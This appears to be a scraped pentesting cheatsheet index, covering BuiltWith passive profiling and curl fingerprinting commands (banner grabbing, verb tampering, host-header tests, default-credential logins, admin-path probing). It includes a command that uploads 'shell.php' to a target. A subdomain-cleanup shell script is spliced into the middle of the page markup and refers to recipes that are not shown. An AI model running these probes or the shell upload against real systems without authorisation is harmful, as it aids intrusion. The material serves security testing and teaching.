Trends / market share https://trends.builtwith.com/ Relationships (same owner / IDs) https://builtwith.com/relationships/ Redirect graph https://builtwith.com/redirect/ API docs (paid) https://api.builtwith.com/ Browser extension (Chrome/Firefox) search \u0026ldquo;BuiltWith Technology Profiler\u0026rdquo; in store Quick CLI Lookups (no API key required) # Open profile in default browser xdg-open \u0026#34;https://builtwith.com/target.tld\u0026#34; # Scrape the public profile page (limited; HTML changes) curl -s -A \u0026#34;Mozilla/5.0\u0026#34; \u0026#34;https://builtwith.com/target.tld\u0026#34; -o builtwith.html # Extract technology names (rough) curl -s -A \u0026#34;Mozilla/5.0\u0026#34; \u0026#34;https://builtwith.com/target.tld\u0026#34; \\ | grep -oE \u0026#39;href=\u0026#34;/[a-z0-9-]+\u0026#34;[^\u0026gt;]*\u0026gt;[^\u0026lt;]+\u0026#39; | sort -u For reliable structured data, use the paid API below.\nAPI (Paid) — Cheatsheet Set BW_KEY in your env first:\nexport BW_KEY=\u0026#34;\u0026lt;your-api-key\u0026gt;\u0026#34; Domain API — current tech stack curl -s \u0026#34;https://api.builtwith.com/v21/api.json?KEY=$BW_KEY\u0026amp;LOOKUP=target.tld\u0026#34; | jq . Free API — current snapshot only curl -s \u0026#34;https://api.builtwith.com/free1/api.json?KEY=$BW_KEY\u0026amp;LOOKUP=target.tld\u0026#34; | jq . Domains API — find sites using a tech curl -s \u0026#34;https://api.builtwith.com/lists7/api.json?KEY=$BW_KEY\u0026amp;TECH=Shopify\u0026#34; | jq . Relationships API — sites sharing analytics / ad IDs curl -s \u0026#34;https://api.builtwith.com/rv1/api.json?KEY=$BW_KEY\u0026amp;LOOKUP=target.tld\u0026#34; | jq . Trends API — adoption stats for a tech curl -s \u0026#34;https://api.builtwith.com/trends/v6/api.json?KEY=$BW_KEY\u0026amp;TECH=WordPress\u0026#34; | jq . 
What It Reveals Tech stack: CMS, frameworks, JS libs, web server, OS hints Analytics / advertising: Google Analytics IDs, GTM, Meta pixel, Hotjar, ad networks Hosting / infra: ASN, hosting provider, CDN, DNS provider, certificate issuer Ecommerce: platform, payment processors, shipping integrations Email / marketing: SPF/DKIM hints, ESP (Mailchimp, SendGrid), CRM Historical changes: when a tech was added/removed (premium tier) Relationships: other domains owned by the same entity (shared GA ID, AdSense ID, etc.) — strong OSINT pivot OSINT Pivots # Same Google Analytics ID → likely same owner # Profile page → \u0026#34;Relationship Profile\u0026#34; → list of sibling domains xdg-open \u0026#34;https://builtwith.com/relationships/target.tld\u0026#34; # Redirect chain history xdg-open \u0026#34;https://builtwith.com/redirect/target.tld\u0026#34; Tips Passive only. BuiltWith fetched the target previously; you don\u0026rsquo;t touch it. Historical tech list is great for guessing legacy stacks left exposed on subdomains. Shared GA / AdSense IDs are a classic attribution pivot — confirm with crt.sh, WHOIS, and DNS. Free tier limits depth — for active engagements, combine with [[wappalyzer]] and [[whatweb]] to get current ground truth. BuiltWith data can be stale; verify versions before basing exploitation on them. Related [[wappalyzer]] — live tech detection from your browser. [[whatweb]] — active CLI fingerprinting. [[netcraft]] — hosting / SSL / OS history with strong passive recon overlap. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/builtwith/","summary":"\u003ch1 id=\"builtwith-cheatsheet\"\u003eBuiltWith Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Passive technology profiling of a domain — current stack plus historical changes, hosting, analytics, ad networks, ecommerce, CDN, certificates, and more. 
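Added example, written for this page rather than taken from the d3vilsec cheatsheets or from the assetfinder, subfinder or amass projects. It covers the assetfinder pipeline recipes and the "combine with other tools for coverage" one-liner above, and the note that output may contain duplicates: the union of several passive sources also carries wildcard entries, mixed case, trailing dots and out-of-scope related domains, none of which `sort -u` removes. `merge_subs`, `sample_input` and the host names fed to them are assumptions made up for the demo; the real tools appear only in a comment, so the script runs offline.

```sh
#!/bin/sh
# Added example (not code from d3vilsec, assetfinder, subfinder or amass).
# Normalises the raw union of several passive subdomain tools before the
# results are handed to httprobe/nmap. Tool output is not uniform: crt.sh
# entries arrive as wildcards (*.example.com), some sources mix case or add a
# trailing dot, and without --subs-only assetfinder also returns related
# domains outside the target apex. `sort -u` alone leaves all of that in.
# Requires only POSIX sh, tr, sed, grep, awk and sort.

# merge_subs APEX
#   Reads candidate host names on stdin and prints the in-scope set for APEX
#   (APEX itself or anything ending in ".APEX"): lowercased, trimmed, free of
#   wildcard prefixes and trailing dots, deduplicated, one name per line.
merge_subs() {
  apex=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
  tr 'A-Z' 'a-z' \
    | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' \
          -e 's/^\*\.//' -e 's/\.$//' \
    | grep -E '^[a-z0-9_]([a-z0-9_-]*[a-z0-9_])?(\.[a-z0-9_]([a-z0-9_-]*[a-z0-9_])?)+$' \
    | awk -v apex="$apex" \
        '$0 == apex || substr($0, length($0) - length(apex)) == ("." apex)' \
    | LC_ALL=C sort -u
}

# sample_input
#   Constructed stand-in for `(assetfinder ...; subfinder ...; amass enum ...)`
#   output. These names are made up for the demo, not real recon data.
sample_input() {
  cat <<'EOF'
example.com
www.example.com
WWW.Example.com
*.example.com
api.example.com.
example.com.evil.net
notexample.com
mail.example.com
staging.example.com
   dev.example.com
example.org
sub.example.com
EOF
}

# Real use (needs network access and the tools installed; not run here):
#   (assetfinder --subs-only example.com; subfinder -d example.com -silent; \
#    amass enum -passive -d example.com) | merge_subs example.com > all_subs.txt

if [ "${1:-}" = "--demo" ]; then
  sample_input | merge_subs example.com
fi
```

Run with `--demo` to see the seven names that survive from the twelve constructed lines. The grep keeps only syntactically valid host names, and the awk suffix test rejects look-alikes such as `notexample.com` and `example.com.evil.net`, which a plain `grep example.com` would wave through into the probing stage.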
Useful for OSINT recon without touching the target.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFormat:\u003c/strong\u003e Web service (free tier + paid API). No local install required for basic lookups.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"access-points\"\u003eAccess Points\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSurface\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eURL\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eProfile lookup (single domain)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://builtwith.com/\"\u003ehttps://builtwith.com/\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eFree quick lookup\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://builtwith.com/\"\u003ehttps://builtwith.com/\u003c/a\u003e?\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eTrends / market share\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://trends.builtwith.com/\"\u003ehttps://trends.builtwith.com/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eRelationships (same owner / IDs)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://builtwith.com/relationships/\"\u003ehttps://builtwith.com/relationships/\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eRedirect graph\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://builtwith.com/redirect/\"\u003ehttps://builtwith.com/redirect/\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eAPI docs (paid)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca 
href=\"https://api.builtwith.com/\"\u003ehttps://api.builtwith.com/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eBrowser extension (Chrome/Firefox)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003esearch \u0026ldquo;BuiltWith Technology Profiler\u0026rdquo; in store\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"quick-cli-lookups-no-api-key-required\"\u003eQuick CLI Lookups (no API key required)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Open profile in default browser\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exdg-open \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://builtwith.com/target.tld\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scrape the public profile page (limited; HTML changes)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -A \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://builtwith.com/target.tld\u0026#34;\u003c/span\u003e -o builtwith.html\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Extract technology names 
(rough)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -A \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://builtwith.com/target.tld\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  | grep -oE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;href=\u0026#34;/[a-z0-9-]+\u0026#34;[^\u0026gt;]*\u0026gt;[^\u0026lt;]+\u0026#39;\u003c/span\u003e | sort -u\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eFor reliable structured data, use the \u003cstrong\u003epaid API\u003c/strong\u003e below.\u003c/p\u003e","title":"builtwith"},{"content":"curl Cheatsheet (Web Fingerprinting) Purpose: Manual HTTP(S) requests for header inspection, banner grabbing, fingerprinting and quick endpoint testing.\nCore Flags Flag Description -I HEAD request (headers only) -i Include response headers in output -v Verbose (request + response, TLS info) --trace-ascii - Full wire trace -s Silent (no progress meter) -S Show errors even with -s -L Follow redirects -k / --insecure Ignore TLS cert errors -o \u0026lt;file\u0026gt; Write body to file -O Save with remote filename -A \u0026lt;ua\u0026gt; Set User-Agent -e \u0026lt;ref\u0026gt; Set Referer -H \u0026quot;\u0026lt;hdr\u0026gt;: \u0026lt;val\u0026gt;\u0026quot; Custom header (repeatable) -X \u0026lt;METHOD\u0026gt; HTTP method (GET, POST, PUT, DELETE, etc.) 
-d \u0026lt;data\u0026gt; POST body (application/x-www-form-urlencoded) --data-raw POST body; like -d but @ is not treated as a file name --data-binary POST body as-is (preserve newlines) -F \u0026lt;field\u0026gt;=\u0026lt;val\u0026gt; Multipart form upload -b \u0026lt;cookie\u0026gt; / -c \u0026lt;file\u0026gt; Send cookie / save cookies -u user:pass HTTP Basic auth -x \u0026lt;proxy\u0026gt; Use proxy (e.g. http://127.0.0.1:8080) --resolve host:port:ip Force DNS resolution (Host-header testing) --max-time \u0026lt;s\u0026gt; Hard timeout --connect-timeout \u0026lt;s\u0026gt; Connect timeout -w \u0026quot;\u0026lt;format\u0026gt;\u0026quot; Write-out format (timings, codes) Banner Grabbing / Header Inspection curl -I https://target.tld # HEAD: server, framework, cookies curl -sI https://target.tld | grep -iE \u0026#39;server|x-powered-by|x-aspnet|via|set-cookie\u0026#39; curl -sIL https://target.tld # Follow redirects, show every hop curl -v https://target.tld 2\u0026gt;\u0026amp;1 | grep -iE \u0026#39;^\u0026lt; \u0026#39; # All response headers Verbose / TLS Inspection curl -v https://target.tld # Cert chain, ALPN, ciphers curl -vk https://target.tld # Ignore cert errors curl --trace-ascii trace.log https://target.tld # Full request/response dump curl -v --tls-max 1.2 https://target.tld # Pin max TLS version Method / Verb Tampering curl -X OPTIONS -i https://target.tld/ # Allowed methods curl -X PUT -d \u0026#34;test\u0026#34; -i https://target.tld/file.txt curl -X DELETE -i https://target.tld/resource/1 curl -X TRACE -i https://target.tld/ # Cross-Site Tracing check Virtual Host / Host Header Testing curl -s -H \u0026#34;Host: dev.target.tld\u0026#34; http://\u0026lt;ip\u0026gt;/ -o dev.html curl -sI --resolve target.tld:443:\u0026lt;ip\u0026gt; https://target.tld/ curl -s -H \u0026#34;Host: admin.internal\u0026#34; http://\u0026lt;ip\u0026gt;/ # Find vhosts on shared IP Cookies \u0026amp; Sessions curl -c cookies.txt -b cookies.txt https://target.tld/login curl -b 
\u0026#34;session=abcd1234\u0026#34; https://target.tld/dashboard curl -c - https://target.tld/ # Print Set-Cookie to stdout Authentication curl -u admin:password https://target.tld/admin # Basic curl -H \u0026#34;Authorization: Bearer \u0026lt;jwt\u0026gt;\u0026#34; https://api.target.tld/ curl --ntlm -u \u0026#39;DOMAIN\\user:pass\u0026#39; https://target.tld/ curl --digest -u user:pass https://target.tld/ POST / API Testing # Form data curl -X POST -d \u0026#34;user=admin\u0026amp;pass=admin\u0026#34; https://target.tld/login # Raw JSON curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;user\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;pass\u0026#34;:\u0026#34;admin\u0026#34;}\u0026#39; \\ https://target.tld/api/login # File from disk curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; \\ --data-binary @payload.json https://target.tld/api # Multipart upload curl -F \u0026#34;file=@shell.php\u0026#34; -F \u0026#34;submit=upload\u0026#34; https://target.tld/upload.php Proxy (Burp / ZAP) curl -x http://127.0.0.1:8080 -k https://target.tld/ export https_proxy=http://127.0.0.1:8080 # Per-shell proxy Useful Write-Out Format curl -s -o /dev/null -w \\ \u0026#34;code:%{http_code} size:%{size_download} time:%{time_total}s redir:%{redirect_url} \u0026#34; \\ https://target.tld/ Fingerprinting Recipes # Quick stack identification curl -sIL https://target.tld | grep -iE \u0026#39;server|x-powered-by|x-generator|x-drupal|x-aspnet\u0026#39; # Pull robots.txt + sitemap curl -s https://target.tld/robots.txt curl -s https://target.tld/sitemap.xml | head # Search response body for tech tells curl -s https://target.tld/ | grep -iE \u0026#39;wp-content|drupal|joomla|laravel|generator=\u0026#39; # Check common admin / framework paths for p in admin login wp-admin administrator phpmyadmin server-status; do printf \u0026#34;%-20s \u0026#34; \u0026#34;$p\u0026#34; curl -sk -o /dev/null -w \u0026#34;%{http_code} \u0026#34; 
\u0026#34;https://target.tld/$p\u0026#34; done Tips HEAD (-I) can lie or be blocked — fall back to -sI -X GET, or to -s -o /dev/null -D -, which sends a real GET and prints only the response headers. Combine -v with -o /dev/null to inspect headers without dumping a big body. --resolve beats editing /etc/hosts for one-off vhost checks. -k is for testing only; never disable cert checks in production tooling. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/curl/","summary":"\u003ch1 id=\"curl-cheatsheet-web-fingerprinting\"\u003ecurl Cheatsheet (Web Fingerprinting)\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Manual HTTP(S) requests for header inspection, banner grabbing, fingerprinting and quick endpoint testing.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"core-flags\"\u003eCore Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-I\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHEAD request (headers only)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-i\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInclude response headers in output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose (request + response, TLS info)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--trace-ascii -\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFull wire 
trace\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSilent (no progress meter)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-S\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow errors even with \u003ccode\u003e-s\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-L\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFollow redirects\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-k\u003c/code\u003e / \u003ccode\u003e--insecure\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIgnore TLS cert errors\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite body to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-O\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave with remote filename\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-A \u0026lt;ua\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet User-Agent\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-e \u0026lt;ref\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet Referer\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H \u0026quot;\u0026lt;hdr\u0026gt;: \u0026lt;val\u0026gt;\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-X 
\u0026lt;METHOD\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP method (GET, POST, PUT, DELETE, etc.)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;data\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePOST body (\u003ccode\u003eapplication/x-www-form-urlencoded\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--data-raw\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePOST body; like \u003ccode\u003e-d\u003c/code\u003e but \u003ccode\u003e@\u003c/code\u003e is not treated as a file name\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--data-binary\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePOST body as-is (preserve newlines)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-F \u0026lt;field\u0026gt;=\u0026lt;val\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMultipart form upload\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-b \u0026lt;cookie\u0026gt;\u003c/code\u003e / \u003ccode\u003e-c \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSend cookie / save cookies\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u user:pass\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-x \u0026lt;proxy\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse proxy (e.g. 
\u003ccode\u003ehttp://127.0.0.1:8080\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--resolve host:port:ip\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eForce DNS resolution (Host-header testing)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--max-time \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHard timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--connect-timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eConnect timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026quot;\u0026lt;format\u0026gt;\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite-out format (timings, codes)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner-grabbing--header-inspection\"\u003eBanner Grabbing / Header Inspection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -I https://target.tld                           \u003cspan style=\"color:#75715e\"\u003e# HEAD: server, framework, cookies\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sI https://target.tld | grep -iE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;server|x-powered-by|x-aspnet|via|set-cookie\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sIL https://target.tld                         \u003cspan 
style=\"color:#75715e\"\u003e# Follow redirects, show every hop\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v https://target.tld 2\u0026gt;\u0026amp;\u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e | grep -iE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;^\u0026lt; \u0026#39;\u003c/span\u003e     \u003cspan style=\"color:#75715e\"\u003e# All response headers\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"verbose--tls-inspection\"\u003eVerbose / TLS Inspection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v https://target.tld                           \u003cspan style=\"color:#75715e\"\u003e# Cert chain, ALPN, ciphers\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -vk https://target.tld                          \u003cspan style=\"color:#75715e\"\u003e# Ignore cert errors\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl --trace-ascii trace.log https://target.tld      \u003cspan style=\"color:#75715e\"\u003e# Full request/response dump\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v --tls-max 1.2 https://target.tld             \u003cspan style=\"color:#75715e\"\u003e# Pin max TLS version\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"method--verb-tampering\"\u003eMethod / Verb Tampering\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre 
tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X OPTIONS -i https://target.tld/               \u003cspan style=\"color:#75715e\"\u003e# Allowed methods\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X PUT -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;test\u0026#34;\u003c/span\u003e -i https://target.tld/file.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X DELETE -i https://target.tld/resource/1\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X TRACE -i https://target.tld/                 \u003cspan style=\"color:#75715e\"\u003e# Cross-Site Tracing check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"virtual-host--host-header-testing\"\u003eVirtual Host / Host Header Testing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -H \u003cspan 